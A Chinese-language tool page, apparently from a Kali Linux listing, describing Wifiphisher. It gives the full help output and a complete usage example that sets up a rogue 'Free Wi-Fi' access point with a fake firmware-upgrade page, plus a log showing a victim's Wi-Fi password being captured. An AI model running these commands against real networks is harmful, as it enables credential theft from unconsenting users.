wifiphisher 介绍

Wifiphisher是一个安全工具,安装自动化网络钓鱼攻击的wifi网络, attacker-controlled会把所有HTTP请求重定向到钓鱼页面Wifiphisher,通过此恶意软件得到目标用户的接口信息等等,这是一个社会工程攻击,可以获得WPA/WPA2密码,与其他方法不同,它不需要任何暴力破解,

从受害者的角度来看,这次袭击发生在三个阶段:
目标受害者是不认证接入点,
目标受害者加入一个欺诈接入点,Wifiphisher探测区域,复制目标接入点设置,
目标受害者登录一个真实的定制的钓鱼页面,

作者:sophron
证书:GPLv3

工具来源
工具主页
Kali wifiphisher Repo 仓库

wifiphisher — 自动化网络钓鱼攻击的wifi网络

root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

wifiphisher 用法示例

不执行干扰(-nJ),创建一个无线访问点(-e “Free Wi-Fi”)和现在的一个假的固件升级到客户(-T firmware-upgrade),当客户端连接时,他们看到在网页输入他们的网络的PSK钥匙:

root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:

DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3

HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93